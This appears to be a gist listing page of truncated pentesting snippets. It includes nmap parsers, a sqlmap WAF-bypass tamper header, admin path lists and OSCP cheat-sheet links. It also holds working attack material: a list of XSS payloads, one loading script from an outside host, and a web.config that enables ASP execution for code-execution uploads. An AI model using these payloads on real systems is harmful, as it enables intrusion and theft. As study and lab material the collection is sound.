search?query=X-Blackboard-product%3A+Blackboard+Learn
| Application | CVE | Infos | Port | 
|---|---|---|---|
| APACHE CASSANDRA 3.8 / ZooKEEPER | CVE-2018-8016 | LINK | 7199 | 
| NI | 
| #!/usr/bin/env python | |
| ## $ ports.py nmap.xml | |
| ## 8.8.8.8:80 | |
| ## 8.8.8.8:443 | |
| ## 8.8.8.8:3305 | |
| #install requirements: pip install python-libnmap | |
| #uses python 2 | 
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> | 
search?query=X-Blackboard-product%3A+Blackboard+Learn
| Application | CVE | Infos | Port | 
|---|---|---|---|
| APACHE CASSANDRA 3.8 / ZooKEEPER | CVE-2018-8016 | LINK | 7199 | 
| NI | 
| #!/bin/bash | |
| HTB_DATA_DIR=~/Documents/HTB/ | |
| if [[ $1 ]]; then | |
| a=1 | |
| else | |
| echo "Usage: $0 <Box name>" | |
| exit 1 | |
| fi | 
| #!/usr/bin/env python | |
| """ | |
| sqlmap tamper script for bypassing WAF | |
| g4mm4 is my hero | |
| """ | |
| import re | |
| import random | |
| from lib.core.data import kb | |
| from lib.core.enums import PRIORITY | 
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | 
| # Pull Resolved Hosts From .gnmap Files | |
| grep "Host: " *.gnmap|sed 's/\t/ /g'|tr -s '[:space:]'|cut -d" " -f3|awk '!/\(\)/'|sort -u|sed 's/(//g;s/)//g' | |
| # Pull Alive Host IPs Based on Open Port From .gnmap Files | |
| grep "Host:.*Ports:.*/open/" *.gnmap|cut -d" " -f2 | |
| # Pull Alive Host IPs Based on Status Form .gnmap Files (Varying Results Based On Scan Flags [i.e.: -Pn]) | |
| grep "Host:.*Status: Up" *.gnmap|cut -d" " -f2 | |
| # Common Discovery Scan String (Known RTT) | 
| bash,pentesting one-liners and stuff | |
| Basics | |
| grep case insensitive | |
| grep -i "<this>" <file> | |
| grep recursively | |
| grep -ir "<this>" <directory> | |
| grep with word match only (string starting/ending with non-word constituent character) | |
| grep -wi "<this>" <file> | |
| remove/delete filename from grep output | |
| grep -hi "<this>" <file> | 
| /admin/admin.js | |
| /admin/appinfo.jsp | |
| /admin/cache_stats.jsp | |
| /admin/catalogcache.jsp | |
| /admin/ccms/customizing.jsp | |
| /admin/ccms/result.jsp | |
| /admin/ccms/sendFailure.jsp | |
| /ecall/jsp/customer/login/login.jsp | |
| /ecall/jsp/customer/upload/upload.jsp | |
| /user/admin/index.jsp | 
| #notes | |
| https://www.cnblogs.com/keepmoving1113/tag/OSCP/ | |
| https://hausec.com/pentesting-cheatsheet/ | |
| https://highon.coffee/blog/penetration-testing-tools-cheat-sheet | |
| https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md | |
| https://noobsec.net/oscp-cheatsheet/ | |
| https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html | |
| https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/ | |
| https://github.com/OlivierLaflamme/Cheatsheet-God | |
| https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html |